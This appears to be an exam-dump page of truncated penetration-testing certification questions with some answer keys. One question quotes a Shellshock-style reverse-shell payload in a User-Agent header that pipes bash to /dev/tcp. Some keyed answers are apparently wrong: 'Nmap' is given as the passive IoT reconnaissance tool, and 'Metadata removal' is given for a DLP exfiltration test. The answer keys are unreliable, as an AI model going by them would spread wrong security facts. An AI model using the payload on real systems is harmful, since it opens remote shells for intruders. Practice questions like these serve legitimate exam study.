- All Exams Instant Download
Which of the following tools would be BEST suited for this task?
A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?A . GDB B. Burp Suite C. SearchSpliot D. NetcatView AnswerAnswer: A
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?A . Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during...
Which of the following actions should the tester take?
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the...
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...
Which of the following log files will show this activity?
A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?A . /var/log/messages B....
Which of the following techniques should the tester select to accomplish this task?
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?A . Steganography B. Metadata removal C. Encryption D. Encode64View AnswerAnswer: B Explanation: All other answers are a...
Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?A . Specially craft and deploy phishing emails to key...
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?A . Shodan B. Nmap C. WebScarab-NG D. NessusView AnswerAnswer: B
Which of the following objectives is the tester attempting to achieve?
A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve?A . Determine active hosts on the network. B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most...
Which of the following should the penetration tester consider BEFORE running a scan?
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any...
